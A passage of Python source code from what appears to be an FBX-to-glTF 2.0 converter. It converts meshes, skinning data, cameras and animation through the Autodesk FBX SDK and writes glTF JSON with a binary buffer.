pLayer.GetIndexArray()\n lDirectArray = pLayer.GetDirectArray()\n for idx in lIndexArray:\n pOutput.append(lDirectArray.GetAt(idx))\n\n return False\n elif lMappingMode == FbxLayerElement.eByPolygonVertex:\n if lReferenceMode == FbxLayerElement.eDirect:\n for vec in pLayer.GetDirectArray():\n pOutput.append(vec)\n # Need to split vertex\n # TODO: Normal per vertex will still have ByPolygonVertex in COLLADA\n elif lReferenceMode == FbxLayerElement.eIndexToDirect:\n lIndexArray = pLayer.GetIndexArray()\n lDirectArray = pLayer.GetDirectArray()\n for idx in lIndexArray:\n pOutput.append(lDirectArray.GetAt(idx))\n else:\n print(\"Unsupported mapping mode \" + lMappingMode)\n\n return True\n\ndef CreateSkin():\n lSkinIdx = len(lib_skins)\n # https://github.com/KhronosGroup/glTF/issues/100\n lib_skins.append({\n 'joints' : [],\n })\n\n return lSkinIdx\n\n_defaultMaterialName = 'DEFAULT_MAT_'\n_defaultMaterialIndex = 0\n\ndef ConvertMesh(pScene, pMesh, pNode, pSkin, pClusters):\n\n global _defaultMaterialIndex\n\n lGLTFPrimitive = {}\n lPositions = []\n lNormals = []\n lTexcoords = []\n lTexcoords2 = []\n lIndices = []\n\n lWeights = []\n lJoints = []\n # Count joint number of each vertex\n lJointCounts = []\n\n # Only consider layer 0\n lLayer = pMesh.GetLayer(0)\n # Uv of lightmap on layer 1\n # PENDING Uv2 always on layer 1?\n lLayer2 = pMesh.GetLayer(1)\n\n if lLayer:\n ## Handle material\n lLayerMaterial = lLayer.GetMaterials()\n lMaterial = None\n if not lLayerMaterial:\n print(\"Mesh \" + pNode.GetName() + \" doesn't have material\")\n lMaterial = FbxSurfacePhong.Create(pScene, _defaultMaterialName + str(_defaultMaterialIndex))\n _defaultMaterialIndex += 1\n else:\n # Mapping Mode of material must be eAllSame\n # Because the mesh has been splitted by material\n idx = lLayerMaterial.GetIndexArray()[0]\n lMaterial = pNode.GetMaterial(idx)\n lMaterialKey = ConvertToPBRMaterial(lMaterial)\n lGLTFPrimitive[\"material\"] = lMaterialKey\n\n lNormalSplitted = False\n lUvSplitted = False\n lUv2Splitted = False\n ## Handle normals\n lLayerNormal = lLayer.GetNormals()\n if lLayerNormal:\n lNormalSplitted = ConvertVertexLayer(pMesh, lLayerNormal, lNormals)\n if len(lNormals) == 0:\n lLayerNormal = None\n\n ## Handle uvs\n lLayerUV = lLayer.GetUVs()\n\n lLayer2Uv = None\n\n if lLayerUV:\n lUvSplitted = ConvertVertexLayer(pMesh, lLayerUV, lTexcoords)\n if ENV_FLIP_V:\n for i in range(len(lTexcoords)):\n # glTF2.0 don't flipY. So flip the uv.\n lTexcoords[i] = [lTexcoords[i][0], 1.0 - lTexcoords[i][1]]\n if len(lTexcoords) == 0:\n lLayerUV = None\n\n if lLayer2:\n lLayer2Uv = lLayer2.GetUVs()\n if lLayer2Uv:\n lUv2Splitted = ConvertVertexLayer(pMesh, lLayer2Uv, lTexcoords2)\n if ENV_FLIP_V:\n for i in range(len(lTexcoords2)):\n lTexcoords2[i] = [lTexcoords2[i][0], 1.0 - lTexcoords2[i][1]]\n if len(lTexcoords2) == 0:\n lLayer2Uv = None\n\n hasSkin = False\n moreThanFourJoints = False\n lMaxJointCount = 0\n ## Handle Skinning data\n if (pMesh.GetDeformerCount(FbxDeformer.eSkin) > 0):\n hasSkin = True\n lControlPointsCount = pMesh.GetControlPointsCount()\n for i in range(lControlPointsCount):\n lWeights.append([0, 0, 0, 0])\n # -1 can't used in UNSIGNED_SHORT\n lJoints.append([0, 0, 0, 0])\n lJointCounts.append(0)\n\n for i in range(pMesh.GetDeformerCount(FbxDeformer.eSkin)):\n lDeformer = pMesh.GetDeformer(i, FbxDeformer.eSkin)\n\n for i2 in range(lDeformer.GetClusterCount()):\n lCluster = lDeformer.GetCluster(i2)\n lNode = lCluster.GetLink()\n lJointIndex = -1\n lNodeIdx = GetNodeIdx(lNode)\n if not lNodeIdx in pSkin['joints']:\n lJointIndex = len(pSkin['joints'])\n pSkin['joints'].append(lNodeIdx)\n\n pClusters[lNodeIdx] = lCluster\n else:\n lJointIndex = pSkin['joints'].index(lNodeIdx)\n\n lControlPointIndices = lCluster.GetControlPointIndices()\n lControlPointWeights = lCluster.GetControlPointWeights()\n\n for i3 in range(lCluster.GetControlPointIndicesCount()):\n lControlPointIndex = lControlPointIndices[i3]\n lControlPointWeight = lControlPointWeights[i3]\n lJointCount = lJointCounts[lControlPointIndex]\n\n # At most binding four joint per vertex\n if lJointCount <= 3:\n # Joint index\n lJoints[lControlPointIndex][lJointCount] = lJointIndex\n lWeights[lControlPointIndex][lJointCount] = lControlPointWeight\n else:\n moreThanFourJoints = True\n # More than four joints, replace joint of minimum Weight\n lMinW, lMinIdx = min( (lWeights[lControlPointIndex][i], i) for i in range(len(lWeights[lControlPointIndex])) )\n lJoints[lControlPointIndex][lMinIdx] = lJointIndex\n lWeights[lControlPointIndex][lMinIdx] = lControlPointWeight\n lMaxJointCount = max(lMaxJointCount, lJointIndex)\n lJointCounts[lControlPointIndex] += 1\n if moreThanFourJoints:\n print('More than 4 joints (%d joints) bound to per vertex in %s. ' %(lMaxJointCount, pNode.GetName()))\n\n # Weight is VEC3 because it is normalized\n # TODO Seems most engines needs VEC4 weights.\n # for i in range(len(lWeights)):\n # lWeights[i] = lWeights[i][:3]\n\n if lNormalSplitted or lUvSplitted or lUv2Splitted:\n lCount = 0\n lVertexCount = 0\n lNormalsTmp = []\n lTexcoordsTmp = []\n lTexcoords2Tmp = []\n lJointsTmp = []\n lWeightsTmp = []\n lVertexMap = {}\n\n for idx in pMesh.GetPolygonVertices():\n lPosition = pMesh.GetControlPointAt(idx)\n if not lNormalSplitted:\n # Split normal data\n lNormal = lNormals[idx]\n else:\n lNormal = lNormals[lCount]\n\n if lLayerUV:\n if not lUvSplitted:\n lTexcoord = lTexcoords[idx]\n else:\n lTexcoord = lTexcoords[lCount]\n\n if lLayer2Uv:\n if not lUv2Splitted:\n lTexcoord = lTexcoords2[idx]\n else:\n lTexcoord2 = lTexcoords2[lCount]\n\n lCount += 1\n\n #Compress vertex, hashed with position and normal\n if lLayer2Uv:\n if lLayer2Uv:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2], lTexcoord[0], lTexcoord[1], lTexcoord2[0], lTexcoord2[1])\n else:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2], lTexcoord2[0], lTexcoord2[1])\n elif lLayerUV:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2], lTexcoord[0], lTexcoord[1])\n else:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2])\n\n if lKey in lVertexMap:\n lIndices.append(lVertexMap[lKey])\n else:\n lPositions.append(lPosition)\n lNormalsTmp.append(lNormal)\n\n if lLayerUV:\n lTexcoordsTmp.append(lTexcoord)\n\n if lLayer2Uv:\n lTexcoords2Tmp.append(lTexcoord2)\n\n if hasSkin:\n lWeightsTmp.append(lWeights[idx])\n lJointsTmp.append(lJoints[idx])\n lIndices.append(lVertexCount)\n lVertexMap[lKey] = lVertexCount\n lVertexCount += 1\n\n lNormals = lNormalsTmp\n lTexcoords = lTexcoordsTmp\n lTexcoords2 = lTexcoords2Tmp\n\n if hasSkin:\n lWeights = lWeightsTmp\n lJoints = lJointsTmp\n else:\n lIndices = pMesh.GetPolygonVertices()\n lPositions = pMesh.GetControlPoints()\n\n lGLTFPrimitive['attributes'] = {}\n lGLTFPrimitive['attributes']['POSITION'] = CreateAttributeBuffer(lPositions, 'f', 3)\n if not lLayerNormal == None:\n lGLTFPrimitive['attributes']['NORMAL'] = CreateAttributeBuffer(lNormals, 'f', 3)\n if lLayerUV:\n lGLTFPrimitive['attributes']['TEXCOORD_0'] = CreateAttributeBuffer(lTexcoords, 'f', 2)\n if lLayer2Uv:\n lGLTFPrimitive['attributes']['TEXCOORD_1'] = CreateAttributeBuffer(lTexcoords2, 'f', 2)\n if hasSkin:\n # PENDING UNSIGNED_SHORT will have bug.\n lGLTFPrimitive['attributes']['JOINTS_0'] = CreateAttributeBuffer(lJoints, 'H', 4)\n # TODO Seems most engines needs VEC4 weights.\n lGLTFPrimitive['attributes']['WEIGHTS_0'] = CreateAttributeBuffer(lWeights, 'f', 4)\n\n if len(lPositions) >= 0xffff:\n #Use unsigned int in element indices\n lIndicesType = 'I'\n else:\n lIndicesType = 'H'\n lGLTFPrimitive['indices'] = CreateIndicesBuffer(lIndices, lIndicesType)\n\n return lGLTFPrimitive\n else:\n return None\n\ndef ConvertCamera(pCamera):\n lGLTFCamera = {}\n\n if pCamera.ProjectionType.Get() == FbxCamera.ePerspective:\n lGLTFCamera['type'] = 'perspective'\n lGLTFCamera['perspective'] = {\n \"yfov\": pCamera.FieldOfView.Get(),\n \"znear\": pCamera.NearPlane.Get(),\n \"zfar\": pCamera.FarPlane.Get()\n }\n elif pCamera.ProjectionType.Get() == FbxCamera.eOrthogonal:\n lGLTFCamera['type'] = 'orthographic'\n lGLTFCamera['orthographic'] = {\n # PENDING\n \"xmag\": pCamera.OrthoZoom.Get(),\n \"ymag\": pCamera.OrthoZoom.Get(),\n \"znear\": pCamera.NearPlane.Get(),\n \"zfar\": pCamera.FarPlane.Get()\n }\n\n lCameraIdx = len(lib_cameras)\n lib_cameras.append(lGLTFCamera)\n return lCameraIdx\n\ndef ConvertSceneNode(pScene, pNode, pPoseTime):\n lGLTFNode = {}\n lNodeName = pNode.GetName()\n lGLTFNode['name'] = pNode.GetName()\n\n lib_nodes.append(lGLTFNode)\n\n # Transform matrix\n lGLTFNode['matrix'] = ListFromM4(pNode.EvaluateLocalTransform(pPoseTime, FbxNode.eDestinationPivot))\n\n #PENDING : Triangulate and split all geometry not only the default one ?\n #PENDING : Multiple node use the same mesh ?\n lGeometry = pNode.GetGeometry()\n if not lGeometry == None:\n lMeshKey = lNodeName\n lMeshName = lGeometry.GetName()\n if lMeshName == '':\n lMeshName = lMeshKey\n\n lGLTFMesh = {'name' : lMeshName}\n\n lHasSkin = False\n lGLTFSkin = None\n lClusters = {}\n\n # If any attribute of this node have skinning data\n # (Mesh splitted by material may have multiple MeshAttribute in one node)\n for i in range(pNode.GetNodeAttributeCount()):\n lNodeAttribute = pNode.GetNodeAttributeByIndex(i)\n if lNodeAttribute.GetAttributeType() == FbxNodeAttribute.eMesh:\n if (lNodeAttribute.GetDeformerCount(FbxDeformer.eSkin) > 0):\n lHasSkin = True\n if lHasSkin:\n lSkinIdx = CreateSkin()\n lGLTFSkin = lib_skins[lSkinIdx]\n lGLTFNode['skin'] = lSkinIdx\n\n for i in range(pNode.GetNodeAttributeCount()):\n lNodeAttribute = pNode.GetNodeAttributeByIndex(i)\n if lNodeAttribute.GetAttributeType() == FbxNodeAttribute.eMesh:\n lPrimitive = ConvertMesh(pScene, lNodeAttribute, pNode, lGLTFSkin, lClusters)\n if not lPrimitive == None:\n if (not \"primitives\" in lGLTFMesh):\n lGLTFMesh[\"primitives\"] = []\n lGLTFMesh[\"primitives\"].append(lPrimitive)\n\n if \"primitives\" in lGLTFMesh:\n lMeshIdx = len(lib_meshes)\n lib_meshes.append(lGLTFMesh)\n lGLTFNode['mesh'] = lMeshIdx\n\n if lHasSkin:\n lClusterGlobalInitMatrix = FbxAMatrix()\n lReferenceGlobalInitMatrix = FbxAMatrix()\n\n lIBM = []\n for i in range(len(lGLTFSkin['joints'])):\n lJointIdx = lGLTFSkin['joints'][i]\n lCluster = lClusters[lJointIdx]\n\n # Inverse Bind Pose Matrix\n # Matrix of Mesh\n lCluster.GetTransformMatrix(lReferenceGlobalInitMatrix)\n # Matrix of Joint\n lCluster.GetTransformLinkMatrix(lClusterGlobalInitMatrix)\n # http://blog.csdn.net/bugrunner/article/details/7232291\n # http://help.autodesk.com/view/FBX/2017/ENU/?guid=__cpp_ref__view_scene_2_draw_scene_8cxx_example_html\n m = lClusterGlobalInitMatrix.Inverse() * lReferenceGlobalInitMatrix\n lIBM.append(m)\n\n lGLTFSkin['inverseBindMatrices'] = CreateIBMBuffer(lIBM)\n\n else:\n # Camera and light node attribute\n lNodeAttribute = pNode.GetNodeAttribute()\n if not lNodeAttribute == None:\n lAttributeType = lNodeAttribute.GetAttributeType()\n if lAttributeType == FbxNodeAttribute.eCamera:\n lCameraKey = ConvertCamera(lNodeAttribute)\n lGLTFNode['camera'] = lCameraKey\n\n if pNode.GetChildCount() > 0:\n lGLTFNode['children'] = []\n for i in range(pNode.GetChildCount()):\n lChildNodeIdx = ConvertSceneNode(pScene, pNode.GetChild(i), pPoseTime)\n lGLTFNode['children'].append(lChildNodeIdx)\n\n return GetNodeIdx(pNode)\n\ndef ConvertScene(pScene, pPoseTime):\n lRoot = pScene.GetRootNode()\n\n lGLTFScene = {'nodes' : []}\n\n lSceneIdx = len(lib_scenes)\n lib_scenes.append(lGLTFScene)\n\n for i in range(lRoot.GetChildCount()):\n lNodeIdx = ConvertSceneNode(pScene, lRoot.GetChild(i), pPoseTime)\n lGLTFScene['nodes'].append(lNodeIdx)\n\n return lSceneIdx\n\ndef CreateAnimation(pName):\n lAnimIdx = len(lib_animations)\n lGLTFAnimation = {\n 'name': pName,\n 'channels' : [],\n 'samplers' : []\n }\n\n return lAnimIdx, lGLTFAnimation\n\n_samplerChannels = ['rotation', 'scale', 'translation']\n_timeSamplerHashMap = {}\n\ndef GetPropertyAnimationCurveTime(pAnimCurve):\n lTimeSpan = FbxTimeSpan()\n pAnimCurve.GetTimeInterval(lTimeSpan)\n lStartTimeDouble = lTimeSpan.GetStart().GetSecondDouble()\n lEndTimeDouble = lTimeSpan.GetStop().GetSecondDouble()\n lDuration = lEndTimeDouble - lStartTimeDouble\n\n return lStartTimeDouble, lEndTimeDouble, lDuration\n\nEPSILON = 1e-6\ndef V3Same(a, b):\n return abs(a[0] - b[0]) < EPSILON and abs(a[1] - b[1]) < EPSILON and abs(a[2] - b[2]) < EPSILON\ndef V4Same(a, b):\n return abs(a[0] - b[0]) < EPSILON and abs(a[1] - b[1]) < EPSILON and abs(a[2] - b[2]) < EPSILON and abs(a[3] - b[3]) < EPSILON\ndef V3Middle(a, b):\n return [(a[0] + b[0]) / 2, (a[1] + b[1]) / 2, (a[2] + b[2]) / 2]\ndef QuatSlerp(a, b, t):\n [ax, ay, az, aw] = a\n [bx, by, bz, bw] = b\n ## calc cosine\n cosom = ax * bx + ay * by + az * bz + aw * bw\n ## adjust signs (if necessary)\n if cosom < 0.0:\n cosom = -cosom\n bx = -bx\n by = -by\n bz = -bz\n bw = -bw\n\n ## calculate coefficients\n if 1.0 - cosom > 0.000001:\n ## standard case (slerp)\n omega = math.acos(cosom)\n sinom = math.sin(omega)\n scale0 = math.sin((1.0 - t) * omega) / sinom\n scale1 = math.sin(t * omega) / sinom\n else:\n ## \"from\" and \"to\" quaternions are very close\n ## ... so we can do a linear interpolation\n scale0 = 1.0 - t\n scale1 = t\n ## calculate final values\n return [scale0 * ax + scale1 * bx, scale0 * ay + scale1 * by, scale0 * az + scale1 * bz, scale0 * aw + scale1 * bw]\n\ndef FitLinearInterpolation(pTime, pTranslationChannel, pRotationChannel, pScaleChannel):\n lTranslationChannel = []\n lRotationChannel = []\n lScaleChannel = []\n lTime = []\n lHaveRotation = len(pRotationChannel) > 0\n lHaveScale = len(pScaleChannel) > 0\n lHaveTranslation = len(pTranslationChannel) > 0\n if lHaveRotation:\n lRotationChannel.append(pRotationChannel[0])\n if lHaveScale:\n lScaleChannel.append(pScaleChannel[0])\n if lHaveTranslation:\n lTranslationChannel.append(pTranslationChannel[0])\n lTime.append(pTime[0])\n for i in range(len(pTime)):\n lLinearInterpolated = True\n if i > 1:\n if lHaveTranslation:\n if not V3Same(V3Middle(pTranslationChannel[i - 2], pTranslationChannel[i]), pTranslationChannel[i - 1]):\n lLinearInterpolated = False\n if lHaveScale and lLinearInterpolated:\n if not V3Same(V3Middle(pScaleChannel[i - 2], pScaleChannel[i]), pScaleChannel[i - 1]):\n lLinearInterpolated = False\n if lHaveRotation:\n if not V4Same(QuatSlerp(pRotationChannel[i - 2], pRotationChannel[i], 0.5), pRotationChannel[i - 1]):\n lLinearInterpolated = False\n\n if not lLinearInterpolated:\n if lHaveTranslation:\n lTranslationChannel.append(pTranslationChannel[i - 1])\n if lHaveRotation:\n lRotationChannel.append(pRotationChannel[i - 1])\n if lHaveScale:\n lScaleChannel.append(pScaleChannel[i - 1])\n lTime.append(pTime[i - 1])\n\n if len(pTime) > 1:\n if lHaveRotation:\n lRotationChannel.append(pRotationChannel[len(pRotationChannel) - 1])\n if lHaveScale:\n lScaleChannel.append(pScaleChannel[len(pScaleChannel) - 1])\n if lHaveTranslation:\n lTranslationChannel.append(pTranslationChannel[len(pTranslationChannel) - 1])\n\n lTime.append(pTime[len(pTime) - 1])\n\n return lTime, lTranslationChannel, lRotationChannel, lScaleChannel\n\n\ndef ConvertNodeAnimation(pGLTFAnimation, pAnimLayer, pNode, pSampleRate, pStartTime, pDuration):\n lNodeIdx = GetNodeIdx(pNode)\n\n curves = [\n pNode.LclTranslation.GetCurve(pAnimLayer, 'X'),\n pNode.LclTranslation.GetCurve(pAnimLayer, 'Y'),\n pNode.LclTranslation.GetCurve(pAnimLayer, 'Z'),\n\n pNode.LclRotation.GetCurve(pAnimLayer, 'X'),\n pNode.LclRotation.GetCurve(pAnimLayer, 'Y'),\n pNode.LclRotation.GetCurve(pAnimLayer, 'Z'),\n\n pNode.LclScaling.GetCurve(pAnimLayer, 'X'),\n pNode.LclScaling.GetCurve(pAnimLayer, 'Y'),\n pNode.LclScaling.GetCurve(pAnimLayer, 'Z'),\n ]\n\n lHaveTranslation = any(curves[0:3])\n lHaveRotation = any(curves[3:6])\n lHaveScaling = any(curves[6:9])\n\n # Curve time span may much smaller than stack local time span\n # It can reduce a lot of space\n # PENDING\n lStartTimeDouble = 1000000\n lDuration = 0\n lEndTimeDouble = 0\n for curve in curves:\n if not curve == None:\n lCurveStart, lCurveEnd, lCurveDuration = GetPropertyAnimationCurveTime(curve)\n lStartTimeDouble = min(lCurveStart, lStartTimeDouble)\n lEndTimeDouble = max(lCurveEnd, lEndTimeDouble)\n lDuration = max(lCurveDuration, lDuration)\n\n lDuration = min(lDuration, pDuration)\n lStartTimeDouble = max(lStartTimeDouble, pStartTime)\n\n if lDuration > 0:\n lNumFrames = math.ceil(lDuration / pSampleRate)\n\n lTime = FbxTime()\n\n lTimeChannel = []\n lTranslationChannel = []\n lRotationChannel = []\n lScaleChannel = []\n\n lQuaternion = FbxQuaternion()\n for i in range(lNumFrames):\n lSecondDouble = min(lStartTimeDouble + pSampleRate * i, lEndTimeDouble)\n lTime.SetSecondDouble(lSecondDouble)\n\n lTransform = pNode.EvaluateLocalTransform(lTime, FbxNode.eDestinationPivot)\n lTranslation = lTransform.GetT()\n lQuaternion = lTransform.GetQ()\n lScale = lTransform.GetS()\n\n #Convert quaternion to axis angle\n lTimeChannel.append(lSecondDouble)\n\n if lHaveRotation:\n lRotationChannel.append(list(lQuaternion))\n if lHaveTranslation:\n lTranslationChannel.append(list(lTranslation))\n if lHaveScaling:\n lScaleChannel.append(list(lScale))\n\n lTimeChannel, lTranslationChannel, lRotationChannel, lScaleChannel = FitLinearInterpolation(\n lTimeChannel, lTranslationChannel, lRotationChannel, lScaleChannel\n )\n\n # TODO Performance?\n lTimeAccessorKey = tuple(lTimeChannel)\n if not lTimeAccessorKey in _timeSamplerHashMap:\n # TODO use ubyte.\n _timeSamplerHashMap[lTimeAccessorKey] = CreateAnimationBuffer(lTimeChannel, 'f', 1)\n\n lSamplerAccessors = {\n \"time\": _timeSamplerHashMap[lTimeAccessorKey]\n # \"time\": CreateAnimationBuffer(lTimeChannel, 'f', 1)\n }\n if lHaveTranslation:\n lAccessorIdx = CreateAnimationBuffer(lTranslationChannel, 'f', 3)\n if lAccessorIdx >= 0:\n lSamplerAccessors['translation'] = lAccessorIdx\n if lHaveRotation:\n lAccessorIdx = CreateAnimationBuffer(lRotationChannel, 'f', 4)\n if lAccessorIdx >= 0:\n lSamplerAccessors['rotation'] = lAccessorIdx\n if lHaveScaling:\n lAccessorIdx = CreateAnimationBuffer(lScaleChannel, 'f', 3)\n if lAccessorIdx >= 0:\n lSamplerAccessors['scale'] = lAccessorIdx\n\n #TODO Other interpolation methods\n for path in _samplerChannels:\n if path in lSamplerAccessors:\n lSamplerIdx = len(pGLTFAnimation['samplers'])\n pGLTFAnimation['samplers'].append({\n \"input\": lSamplerAccessors['time'],\n \"interpolation\": \"LINEAR\",\n \"output\": lSamplerAccessors[path]\n })\n pGLTFAnimation['channels'].append({\n \"sampler\" : lSamplerIdx,\n \"target\" : {\n \"node\": lNodeIdx,\n \"path\" : path\n }\n })\n\n for i in range(pNode.GetChildCount()):\n ConvertNodeAnimation(pGLTFAnimation, pAnimLayer, pNode.GetChild(i), pSampleRate, pStartTime, pDuration)\n\ndef ConvertAnimation(pScene, pSampleRate, pStartTime, pDuration):\n lRoot = pScene.GetRootNode()\n for i in range(pScene.GetSrcObjectCount(FbxCriteria.ObjectType(FbxAnimStack.ClassId))):\n lAnimStack = pScene.GetSrcObject(FbxCriteria.ObjectType(FbxAnimStack.ClassId), i)\n lAnimIdx, lGLTFAnimation = CreateAnimation(lAnimStack.GetName())\n for j in range(lAnimStack.GetSrcObjectCount(FbxCriteria.ObjectType(FbxAnimLayer.ClassId))):\n lAnimLayer = lAnimStack.GetSrcObject(FbxCriteria.ObjectType(FbxAnimLayer.ClassId), j)\n # for k in range(lRoot.GetChildCount()):\n ConvertNodeAnimation(lGLTFAnimation, lAnimLayer, lRoot, pSampleRate, pStartTime, pDuration)\n if len(lGLTFAnimation['samplers']) > 0:\n lib_animations.append(lGLTFAnimation)\n# def ConvertAnimation2(pScene, pStartTime, pDuration):\n# for i in range(pScene.GetSrcObjectCount(FbxCriteria.ObjectType(FbxAnimStack.ClassId))):\n# lAnimStack = pScene.GetSrcObject(FbxCriteria.ObjectType(FbxAnimStack.ClassId), i)\n# lAnimName = lAnimStack.GetName()\n\n# lTakeInfo = pScene.GetTakeInfo(lAnimName)\n\n\ndef CreateBufferView(pBufferIdx, pBuffer, appendBufferData, lib, pByteOffset, target=GL_ARRAY_BUFFER):\n if pByteOffset % 4 == 2:\n pBuffer.extend(b'\\x00\\x00')\n pByteOffset += 2\n\n pBuffer.extend(appendBufferData)\n lBufferViewIdx = len(lib_buffer_views)\n lBufferView = {\n \"buffer\": pBufferIdx,\n \"byteLength\": len(appendBufferData),\n \"byteOffset\": pByteOffset,\n # PENDING\n # \"byteStride\": 0,\n \"target\": target\n }\n lib_buffer_views.append(lBufferView)\n for lAttrib in lib:\n lAttrib['bufferView'] = lBufferViewIdx\n\n return lBufferView\n\n\ndef CreateBufferViews(pBufferIdx, pBin):\n\n lByteOffset = CreateBufferView(pBufferIdx, pBin, attributeBuffer, lib_attributes_accessors, 0)['byteLength']\n\n if len(lib_ibm_accessors) > 0:\n lByteOffset += CreateBufferView(pBufferIdx, pBin, invBindMatricesBuffer, lib_ibm_accessors, lByteOffset)['byteLength']\n\n if len(lib_animation_accessors) > 0:\n lByteOffset += CreateBufferView(pBufferIdx, pBin, animationBuffer, lib_animation_accessors, lByteOffset)['byteLength']\n\n #When creating a Float32Array, which the offset must be multiple of 4\n CreateBufferView(pBufferIdx, pBin, indicesBuffer, lib_indices_accessors, lByteOffset, GL_ELEMENT_ARRAY_BUFFER)\n\n\n# Start from -1 and ignore the root node\n_nodeCount = -1\n_nodeIdxMap = {}\ndef PrepareSceneNode(pNode, fbxConverter):\n global _nodeCount\n _nodeIdxMap[pNode.GetUniqueID()] = _nodeCount\n _nodeCount = _nodeCount + 1\n\n for k in range(pNode.GetChildCount()):\n PrepareSceneNode(pNode.GetChild(k), fbxConverter)\n\n# Each node can have two pivot context. The node's animation data can be converted from one pivot context to the other\n# Convert source pivot to destination with all zero pivot.\n# http://docs.autodesk.com/FBX/2013/ENU/FBX-SDK-Documentation/index.html?url=cpp_ref/class_fbx_node.html,topicNumber=cpp_ref_class_fbx_node_html\ndef PrepareBakeTransform(pNode):\n # http://help.autodesk.com/view/FBX/2017/ENU/?guid=__files_GUID_C35D98CB_5148_4B46_82D1_51077D8970EE_htm\n pNode.SetPivotState(FbxNode.eSourcePivot, FbxNode.ePivotActive)\n pNode.SetPivotState(FbxNode.eDestinationPivot, FbxNode.ePivotActive)\n\n lZero = FbxVector4(0, 0, 0)\n pNode.SetPostRotation(FbxNode.eDestinationPivot, lZero);\n pNode.SetPreRotation(FbxNode.eDestinationPivot, lZero);\n pNode.SetRotationOffset(FbxNode.eDestinationPivot, lZero);\n pNode.SetScalingOffset(FbxNode.eDestinationPivot, lZero);\n pNode.SetRotationPivot(FbxNode.eDestinationPivot, lZero);\n pNode.SetScalingPivot(FbxNode.eDestinationPivot, lZero);\n\n pNode.SetGeometricTranslation(FbxNode.eDestinationPivot, lZero);\n pNode.SetGeometricRotation(FbxNode.eDestinationPivot, lZero);\n pNode.SetGeometricScaling(FbxNode.eDestinationPivot, FbxVector4(1, 1, 1));\n # pNode.SetUseQuaternionForInterpolation(FbxNode.eDestinationPivot, pNode.GetUseQuaternionForInterpolation(FbxNode.eSourcePivot));\n\n for k in range(pNode.GetChildCount()):\n PrepareBakeTransform(pNode.GetChild(k))\n\n\ndef GetNodeIdx(pNode):\n lId = pNode.GetUniqueID()\n if not lId in _nodeIdxMap:\n return -1\n return _nodeIdxMap[lId]\n\n# FIXME\n# http://help.autodesk.com/view/FBX/2017/ENU/?guid=__cpp_ref_fbxtime_8h_html\nTIME_INFINITY = FbxTime(0x7fffffffffffffff)\n\ndef Convert(\n filePath,\n ouptutFile = '',\n excluded = [],\n animFrameRate = 1 / 20,\n startTime = 0,\n duration = 1000,\n poseTime = TIME_INFINITY,\n beautify = False\n):\n ignoreScene = 'scene' in excluded\n ignoreAnimation = 'animation' in excluded\n # Prepare the FBX SDK.\n lSdkManager, lScene = InitializeSdkObjects()\n fbxConverter = FbxGeometryConverter(lSdkManager)\n # Load the scene.\n lResult = LoadScene(lSdkManager, lScene, filePath)\n\n if not lResult:\n print(\"\\n\\nAn error occurred while loading the scene...\")\n else:\n lBasename, lExt = os.path.splitext(ouptutFile)\n\n # Do it before SplitMeshesPerMaterial or the vertices of split mesh will be wrong.\n PrepareBakeTransform(lScene.GetRootNode())\n lScene.GetRootNode().ConvertPivotAnimationRecursive(None, FbxNode.eDestinationPivot, 60)\n\n # PENDING Triangulate before SplitMeshesPerMaterial or it will not work.\n fbxConverter.Triangulate(lScene, True)\n\n # TODO SplitMeshPerMaterial may loss deformer in mesh\n # TODO It will be crashed in some fbx files\n # FBX version 2014.2 seems have fixed it\n fbxConverter.SplitMeshesPerMaterial(lScene, True)\n\n PrepareSceneNode(lScene.GetRootNode(), fbxConverter)\n\n if not ignoreScene:\n lSceneIdx = ConvertScene(lScene, poseTime)\n if not ignoreAnimation:\n ConvertAnimation(lScene, animFrameRate, startTime, duration)\n\n #Merge binary data and write to a binary file\n lBin = bytearray()\n\n CreateBufferViews(0, lBin)\n\n lBufferName = lBasename + '.bin'\n lib_buffers.append({'byteLength' : len(lBin), 'uri' : os.path.basename(lBufferName)})\n\n out = open(lBasename + \".bin\", 'wb')\n out.write(lBin)\n out.close()\n\n #Output json\n lOutput = {\n 'asset': {\n 'generator': 'qtek fbx2gltf',\n 'version': '2.0'\n },\n 'accessors' : lib_accessors,\n 'bufferViews' : lib_buffer_views,\n 'buffers' : lib_buffers,\n 'nodes' : lib_nodes,\n 'scenes' : lib_scenes,\n 'meshes' : lib_meshes,\n }\n if len(lib_cameras) > 0:\n lOutput['cameras'] = lib_cameras\n if len(lib_skins) > 0:\n lOutput['skins'] = lib_skins\n if len(lib_materials) > 0:\n lOutput['materials'] = lib_materials\n if len(lib_images) > 0:\n lOutput['images'] = lib_images\n if len(lib_samplers) > 0:\n lOutput['samplers'] = lib_samplers\n if len(lib_textures) > 0:\n lOutput['textures'] = lib_textures\n if len(lib_animations) > 0:\n lOutput['animations'] = lib_animations\n #Default scene\n if not ignoreScene:\n lOutput['scene'] = lSceneIdx\n\n out = open(ouptutFile, 'w')\n indent = None\n seperator = ':'\n\n if beautify:\n indent = 2\n seperator = ': '\n out.write(json.dumps(lOutput, indent = indent, sort_keys = True, separators=(',', seperator)))\n out.close()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='FBX to glTF converter', add_help=True)\n parser.add_argument('-e', '--exclude', type=str, default='', help=\"Data excluded. Can be: scene,animation\")\n parser.add_argument('-t', '--timerange', default='0,1000', type=str, help=\"Export animation time, in format 'startSecond,endSecond'\")\n parser.add_argument('-o', '--output', default='', type=str, help=\"Ouput glTF file path\")\n parser.add_argument('-f', '--framerate', default=20, type=float, help=\"Animation frame per second\")\n parser.add_argument('-p', '--pose', default=0, type=float, help=\"Start pose time\")\n parser.add_argument('-q', '--quantize', action='store_true', help=\"Quantize accessors with WEB3D_quantized_attributes extension\")\n parser.add_argument('-b', '--beautify', action=\"store_true\", help=\"Beautify json output.\")\n\n parser.add_argument('--noflipv', action=\"store_true\", help=\"If not flip v in texcoord.\")\n parser.add_argument('file')\n\n args = parser.parse_args()\n\n lStartTime = 0\n lDuration = 1000\n lTimeRange = args.timerange.split(',')\n if lTimeRange[0]:\n lStartTime = float(lTimeRange[0])\n if lTimeRange[1]:\n lDuration = float(lTimeRange[1])\n\n if not args.output:\n lBasename, lExt = os.path.splitext(args.file)\n args.output = lBasename + '.gltf'\n\n # PENDING Not use INFINITY poseTime or some joint transform without animation maybe not right.\n lPoseTime = FbxTime()\n 